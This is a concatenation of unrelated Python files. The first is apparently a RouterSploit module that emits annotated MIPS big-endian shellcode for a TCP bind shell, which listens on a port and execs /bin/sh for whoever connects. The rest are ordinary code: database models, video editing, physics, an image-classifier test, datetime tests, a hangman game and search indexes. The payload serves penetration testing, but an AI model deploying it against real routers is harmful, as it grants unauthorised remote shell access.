"description": "Creates interactive tcp bind shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.MIPSBE
def generate(self):
bind_port = utils.convert_port(self.rport)
return (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
b"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
b"\x24\x0e\xff\xfd" + # li t6,-3
b"\x01\xc0\x20\x27" + # nor a0,t6,zero
b"\x01\xc0\x28\x27" + # nor a1,t6,zero
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
b"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
b"\x30\x50\xff\xff" + # andi s0,v0,0xffff
b"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
b"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
b"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
b"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
b"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
b"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
b"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
b"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
b"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
b"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
b"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x0e\xff\xef" + # li t6,-17
b"\x01\xc0\x30\x27" + # nor a2,t6,zero
b"\x23\xa5\xff\xe0" + # addi a1,sp,-32
b"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
b"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x05\x01\x01" + # li a1,257
b"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
b"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x28\x05\xff\xff" + # slti a1,zero,-1
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
b"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
b"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
b"\x24\x11\xff\xfd" + # li s1,-3
b"\x02\x20\x88\x27" + # nor s1,s1,zero
b"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
b"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
b"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
b"\x01\x01\x01\x0c" + # syscall 0x40404
b"\x24\x10\xff\xff" + # li s0,-1
b"\x22\x31\xff\xff" + # addi s1,s1,-1
b"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
b"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
b"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
b"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
b"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
b"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
b"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
b"\x27\xa4\xff\xec" + # addiu a0,sp,-20
b"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
b"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
b"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
b"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
b"\x01\x01\x01\x0c" # syscall 0x40404
)
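# Port packing sketch (illustration only; utils.convert_port is provided by the
# framework): the default LPORT 4444 is 0x115C, so the two bytes spliced into the
# "li t6" instruction above are b"\x11\x5c", giving li t6,0x115c as noted in the
# inline comment.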
|
from flask_sqlalchemy import SQLAlchemy
# The rest of the initialization is in __init__.py
database = SQLAlchemy()
class User(database.Model):
uId = database.Column(database.Integer, primary_key = True, nullable = False)
username = database.Column(database.String(50), unique=True,nullable = False)
password = database.Column(database.String(200),nullable = True)
native_lang = database.Column(database.String(50))
report_status = database.Column(database.Integer)
ban_status = database.Column(database.Integer)
languages = database.relationship('Language', backref=database.backref('user', lazy=True))
def __repr__(self):
return '<User %r>' % self.username
class Language(database.Model):
uId = database.Column(database.Integer, database.ForeignKey('user.uId'), nullable = False, primary_key = True,)
language = database.Column(database.String(50), primary_key = True)
fluency = database.Column(database.Integer)
# Example of a language query
# Language.query.with_parent(user).filter(Language.language == 'French').all()
# Returns the results of "user's" Language where language = 'French'
class Room(database.Model):
roomId = database.Column(database.Integer(), primary_key = True, unique=True)
language = database.Column(database.String(50))
initiator = database.Column(database.String(50), nullable = True) # Change to uId if we can figure it out
receiver = database.Column(database.String(50), nullable = False)
initiatorFluency = database.Column(database.Integer())
receiverFluency = database.Column(database.Integer())
already_deleted = database.Column(database.Boolean(), default = False)
#Reporting database
class Report(database.Model):
report_id = database.Column(database.Integer, primary_key = True)
report_status = database.Column(database.Integer)
reporter = database.Column(database.String(50))
reportee = database.Column(database.String(50))
#Administrator
class Admin(database.Model):
uId = database.Column(database.Integer, primary_key = True, nullable = False)
username = database.Column(database.Integer(), unique=True)
password = database.Column(database.String(200))
def __repr__(self):
return '<Admin %r>' % self.username
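# Usage sketch (assuming the Flask app factory in __init__.py calls
# database.init_app(app)): inside an application context the tables can be created
# and a user stored like this (illustration only; `hashed_password` is hypothetical):
#
#   database.create_all()
#   database.session.add(User(username='alice', password=hashed_password, native_lang='English'))
#   database.session.commit()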
|
import os
from moviepy.editor import VideoFileClip
from moviepy.editor import concatenate_videoclips
from .step import Step
from yt_concate.settings import OUTPUT_DIR
import logging
class EditVideo(Step):
def process(self, inputs, utils, data):
logger = logging.getLogger('record')
logger.warning('Editing final video...')
clips = []
if inputs['limit'] > len(data):
limit = len(data)
else:
limit = inputs['limit']
for found in data[:limit]:
s, e = self.parse_clip_time(found)
try:
clips.append(VideoFileClip(found.yt.get_video_filepath()).subclip(s, e))
            except Exception:
                logger.error('Error happened while clipping video: ' + found.yt.id)
final_clip = concatenate_videoclips(clips)
final_clip.write_videofile(os.path.join(OUTPUT_DIR, inputs["channel_id"]+'.mp4'))
return
def parse_clip_time(self,found):
start = found.caption_time[0]
end = found.caption_time[0] + found.caption_time[1]
return start, end
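# Example (illustration only; `found.caption_time` is produced by earlier pipeline
# steps): caption_time == (12.0, 3.5) means the caption starts at 12.0s and lasts
# 3.5s, so parse_clip_time returns (12.0, 15.5) and that span is cut from the video.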
|
from deficrawler.dex import Dex
def test_protocol_entities():
uniswap = Dex(protocol="Uniswap", chain="Ethereum", version=2)
balancer = Dex(protocol="Balancer", chain="Ethereum", version=1)
assert(uniswap.supported_entities() == [
'swap', 'pool'])
assert(balancer.supported_entities() == [
'swap', 'pool'])
|
from kivy.vector import Vector
from parabox.structures import Collector
class ElasticCollissionProcessor(object):
"""Collission processor for elastic objects"""
@staticmethod
def process_collission(first, second):
"""Process collission for two elastic objects
:param first: first widget to check collission
:type first: parabox.behaviour.collidable.Collidable
:param second: second widget to check collission
:type second: parabox.behaviour.collidable.Collidable
"""
if first in Collector.get_collection('movable'):
base, additional = first, second
else:
base, additional = second, first
ElasticCollissionProcessor.clarify_collission_point(base, additional)
base.velocity, additional.velocity =\
ElasticCollissionProcessor.get_velocity_after_collission(
base, additional)
@staticmethod
def clarify_collission_point(first, second):
"""Correct collission point of two widgets
:param first: first collission widget
:type first: parabox.behaviour.collidable.Collidable
:param second: second collission widget
:type second: parabox.behaviour.collidable.Collidable
"""
temp_velocity = second.get_resistance_vector(first)
if temp_velocity == Vector(0, 0):
temp_velocity = Vector(1, 0)
initial_velocity = Vector(first.velocity)
first.velocity = temp_velocity
first.move(first)
while first.collide_widget(second) and second.collide_widget(first):
first.move(first)
first.velocity = -temp_velocity
first.move(first)
first.velocity = initial_velocity
@staticmethod
def get_velocity_after_collission(first, second):
"""Change velocities vectors after collission
:param first: first collission widget
:type first: parabox.behaviour.collidable.Collidable
:param second: second collission widget
:type second: parabox.behaviour.collidable.Collidable
:returns: velocities vectors
        :rtype: tuple
"""
collission_vector_x = second.get_resistance_vector(first)
v1, v2 = first.velocity, second.velocity
system_speed = Vector(v2)
v1, v2 = Vector(v1) - system_speed, Vector(v2) - system_speed
system_rotate_angle = Vector(1, 0).angle(collission_vector_x)
v1a, v1b = Vector(v1).rotate(system_rotate_angle)
mass_ratio = 0 if not second.mass else first.mass / second.mass
u1a_1, u1a_2 = ElasticCollissionProcessor.solve_quadratic_equation(
a=mass_ratio + 1,
b=-2 * mass_ratio * v1a,
c=(mass_ratio - 1) * v1a ** 2)
u1a = u1a_1 if u1a_1 != v1a else u1a_2
u1b = v1b
u2a = mass_ratio * (v1a - u1a)
u2b = 0
u1 = Vector(u1a, u1b).rotate(-system_rotate_angle)
u2 = Vector(u2a, u2b).rotate(-system_rotate_angle)
u1, u2 = u1 + system_speed, u2 + system_speed
return u1, u2
@staticmethod
def solve_quadratic_equation(a, b, c):
"""Returns roots of quadratic equation
ax^2 + bx + c = 0
:return: roots of equation
        :rtype: tuple
"""
D = b ** 2 - 4 * a * c
return (-b + D ** .5) / (2 * a), (-b - D ** .5) / (2 * a)
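if __name__ == '__main__':
    # Sanity-check sketch (not part of the original module): in the equal-mass
    # head-on case (mass_ratio = 1, incoming speed v1a = 4) the quadratic used in
    # get_velocity_after_collission has roots v1a and 0, so the moving body stops
    # and transfers all of its velocity.
    print(ElasticCollissionProcessor.solve_quadratic_equation(a=2, b=-8, c=0))  # (4.0, 0.0)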
|
import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
import datetime
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from torch.utils.tensorboard import SummaryWriter
import torchvision.utils as utils
parser = argparse.ArgumentParser(description='PyTorch Places3 Testing')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('model', metavar='MODEL',
help='path to model checkpoint')
def main():
global args
args = parser.parse_args()
print(args)
# Writer for Tensorboard
global writer
log_dir = "logs/test/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
writer = SummaryWriter(log_dir)
global device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Data loading code
testdir = os.path.join(args.data, 'test')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
test_data = datasets.ImageFolder(testdir, transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
]))
print(test_data.class_to_idx)
global classes
classes = {v: k for k, v in test_data.class_to_idx.items()}
print(classes)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=16, shuffle=True,
num_workers=1, pin_memory=True)
# Load model
# model_file = 'checkpoint/alexnet_best.pth.tar'
model_file = args.model
model = models.__dict__['alexnet'](num_classes=3)
checkpoint = torch.load(model_file, map_location=lambda storage, loc: storage)
state_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}
model.load_state_dict(state_dict)
model.cuda()
model.eval()
# define loss function (criterion)
criterion = nn.CrossEntropyLoss().cuda()
# Testing
prec1 = test(test_loader, model, criterion)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def test(loader, model, criterion):
# batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
with torch.no_grad():
for i, (input, target) in enumerate(loader):
            target = target.cuda(non_blocking=True)
            input = input.cuda(non_blocking=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# print(input_var.device)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
            prec1 = accuracy(output.data, target, topk=(1,))
losses.update(loss.data, input.size(0))
top1.update(prec1[0], input.size(0))
# measure elapsed time
# batch_time.update(time.time() - end)
# end = time.time()
if len(input_var) < 9:
continue
writer.add_figure('predictions vs. actuals',
plot_classes_preds(model, input_var, target),
global_step=i)
print(' Loss {loss.avg:.4f}\tPrec@1 {top1.avg:.3f}'
.format(loss=losses, top1=top1))
return top1.avg
def plot_classes_preds(net, images, labels):
'''
Generates matplotlib Figure using a trained network, along with images
and labels from a batch, that shows the network's top prediction along
with its probability, alongside the actual label, coloring this
information based on whether the prediction was correct or not.
Uses the "images_to_probs" function.
'''
preds, probs = images_to_probs(net, images)
# plot the images in the batch, along with predicted and true labels
fig = plt.figure(figsize=(10, 10))
for idx in np.arange(9):
ax = fig.add_subplot(3, 3, idx+1, xticks=[], yticks=[])
matplotlib_imshow(images[idx], one_channel=True)
ax.set_title("{0}, {1:.1f}%\n(label: {2})".format(
classes[preds[idx]],
probs[idx] * 100.0,
classes[labels[idx].item()]),
color=("green" if preds[idx]==labels[idx].item() else "red"))
return fig
def images_to_probs(net, images):
'''
Generates predictions and corresponding probabilities from a trained
network and a list of images
'''
output = net(images)
# convert output probabilities to predicted class
_, preds_tensor = torch.max(output, 1)
preds = np.squeeze(preds_tensor.cpu().numpy())
return preds, [F.softmax(el, dim=0)[i].item() for i, el in zip(preds, output)]
def matplotlib_imshow(img, one_channel=False):
if one_channel:
img = img.mean(dim=0)
img = img / 2 + 0.5 # unnormalize
npimg = img.cpu().numpy()
if one_channel:
plt.imshow(npimg, cmap="Greys")
else:
plt.imshow(np.transpose(npimg, (1, 2, 0)))
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
# maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(1, 1, True, True)
pred = pred.t()
## Code to test the merging of escalator and staircase
# pred[pred==2] = 0
# target[target==2] = 0
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
# for k in topk:
correct_k = correct[:1].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc. All Rights Reserved.
"""Tests for moe.mercurial."""
__author__ = 'dbentley@google.com (Daniel Bentley)'
from google.apputils import basetest
from moe import base
from moe import mercurial
from moe import moe_app
import test_util
REPO = None
def setUp():
global REPO
moe_app.InitForTest()
REPO = mercurial.MercurialRepository(
EXAMPLE_REPOSITORY_URL,
'test')
# We use an actual repository for end-to-end testing.
EXAMPLE_REPOSITORY_URL = 'https://jgments.googlecode.com/hg/'
class MercurialTest(basetest.TestCase):
def testHeadRevision(self):
self.assertEqual('47b097c7d97e', REPO.GetHeadRevision('47b097c7d97e'))
self.assertNotEqual('47b097c7d97e', REPO.GetHeadRevision())
def testRevisionsSinceEquivalence(self):
def Revision2b02deffcc80(r):
return r.rev_id == '2b02deffcc80'
rs = REPO.RecurUntilMatchingRevision('ceadf5c0ce18', Revision2b02deffcc80)
rev_ids = [r.rev_id for r in rs]
self.assertListEqual(['ceadf5c0ce18', '47b097c7d97e', '2b02deffcc80'],
rev_ids)
def testRevisionFromId(self):
REPO.MakeRevisionFromId('123456789012')
if __name__ == '__main__':
basetest.main()
|
import pytz
from datetime import datetime
import pendulum
from ..conftest import assert_datetime
def test_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, 12, 0, 0,
tzinfo= pendulum.timezone('America/Toronto'))
assert d2 == d1
assert d3 == d1
def test_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_not_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_not_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_none():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
assert d1 != None
def test_greater_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 > d2
assert d1 > d3
def test_greater_than_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 > d2
assert not d1 > d3
def test_greater_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 > d2
assert d1 > d3
def test_greater_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 > d2
assert not d1 > d3
def test_greater_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 >= d2
assert not d1 >= d3
def test_greater_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 >= d2
assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 <= d2
assert not d1 <= d3
def test_less_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 <= d2
assert not d1 <= d3
def test_is_birthday():
with pendulum.test(pendulum.now()):
d = pendulum.now()
a_birthday = d.subtract(years=1)
assert a_birthday.is_birthday()
not_a_birthday = d.subtract(days=1)
assert not not_a_birthday.is_birthday()
also_not_a_birthday = d.add(days=2)
assert not also_not_a_birthday.is_birthday()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_birthday(d1)
assert d3.is_birthday(d1)
def test_closest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
closest = instance.closest(dt2, dt1)
assert closest == dt1
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(*dts)
assert closest == dts[0]
closest = instance.closest(*(dts[::-1]))
assert closest == dts[0]
def test_closest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0)
dt2 = datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(dt1, dt2, *dts)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
def test_closest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
def test_farthest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
farthest = instance.farthest(dt2, dt1)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(*dts)
assert farthest == dts[-1]
farthest = instance.farthest(*(dts[::-1]))
assert farthest == dts[-1]
f = pendulum.datetime(2010, 1, 1, 0, 0, 0)
assert f == instance.farthest(f, *(dts))
def test_farthest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0, tzinfo= pendulum.UTC)
dt2 = datetime(2015, 5, 28, 14, 0, 0, tzinfo= pendulum.UTC)
farthest = instance.farthest(dt1, dt2)
assert_datetime(farthest, 2015, 5, 28, 14, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert_datetime(farthest, 2015, 5, 28, 19, 0, 0)
def test_farthest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert farthest == dts[-1]
def test_is_same_day():
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 29, 12, 0, 0)
dt3 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt4 = datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC)
dt5 = datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
assert not dt1.is_same_day(dt2)
assert dt1.is_same_day(dt3)
assert dt1.is_same_day(dt4)
assert not dt1.is_same_day(dt5)
def test_comparison_to_unsupported():
dt1 = pendulum.now()
assert dt1 != 'test'
assert dt1 not in ['test']
|
"""
File: hangman.py
Name: Jess Hung
-----------------------------
This program plays the hangman game.
The user sees a dashed word and tries to
figure out the hidden word by entering
one character each round.
If the guess is correct, the updated word
is shown on the console. Players have N_TURNS
chances to win the game.
"""
import random
# This constant controls the number of guesses the player has.
N_TURNS = 7
def main():
"""
Hangman Game!
    First, pick the word and the number of turns for this round
    Second, show the player some starting hints
    Third, the player inputs a character
    Fourth, check whether the input is legal
    Last, play hangman!
"""
word = random_word()
n_turn = N_TURNS
reminders(word, n_turn)
guess = str(input('Your guess: '))
guess = check(guess)
hangman(guess, word, n_turn)
def reminders(word, n_turn):
"""
This function gives the player some hints in the beginning
"""
print('The word looks like: ' + '-' * len(word))
print('You have ' + str(n_turn) + ' guesses left.')
def check(guess):
"""
    This function makes the guess case-insensitive
    and uses a loop to validate the player's input
"""
guess = guess.upper()
while not guess.isalpha() or not len(guess) == 1:
print('illegal format')
guess = str(input('Your guess: '))
guess = guess.upper()
return guess
def hangman(guess, word, n_turn):
"""
The function for hangman game procedure
"""
# create the list for documenting the correct guess
ans = []
for char in word:
ans.append('-')
    # the game continues until the number of turns reaches 0
while n_turn > 0:
if guess in word:
print('You are correct!')
for i in range(len(word)):
if guess == word[i]:
ans[i] = guess
if "".join(ans) != word:
print('The word looks like: ' + "".join(ans))
print('You have ' + str(n_turn) + ' guesses left.')
guess = str(input('Your guess: '))
guess = check(guess)
else:
win(word)
break
else:
n_turn -= 1
print('There is no ' + guess + "'s" + ' in the word.')
if n_turn > 0:
print('The word looks like: ' + "".join(ans))
print('You have ' + str(n_turn) + ' guesses left.')
guess = str(input('Your guess: '))
guess = check(guess)
else:
lose(word)
break
def win(word):
"""
Final note for the winner!
"""
print('You win!!')
print('The word was: ' + word)
def lose(word):
"""
Final note for the loser ;(
"""
print('You are completely hung :(')
print('The word was: ' + word)
def random_word():
num = random.choice(range(9))
if num == 0:
return "NOTORIOUS"
elif num == 1:
return "GLAMOROUS"
elif num == 2:
return "CAUTIOUS"
elif num == 3:
return "DEMOCRACY"
elif num == 4:
return "BOYCOTT"
elif num == 5:
return "ENTHUSIASTIC"
elif num == 6:
return "HOSPITALITY"
elif num == 7:
return "BUNDLE"
elif num == 8:
return "REFUND"
##### DO NOT EDIT THE CODE BELOW THIS LINE #####
if __name__ == '__main__':
main()
|
from algoliasearch_django import AlgoliaIndex
from algoliasearch_django.decorators import register
from products.models import Product
from category.models import Category
@register(Product)
class ProductIndex(AlgoliaIndex):
fields = ('title',)
settings = {
'searchableAttributes': ['title',]
}
index_name = 'products'
@register(Category)
class CategoryIndex(AlgoliaIndex):
fields = ('category',)
settings = {
'searchableAttributes': ['category',]
}
index_name = 'categories'
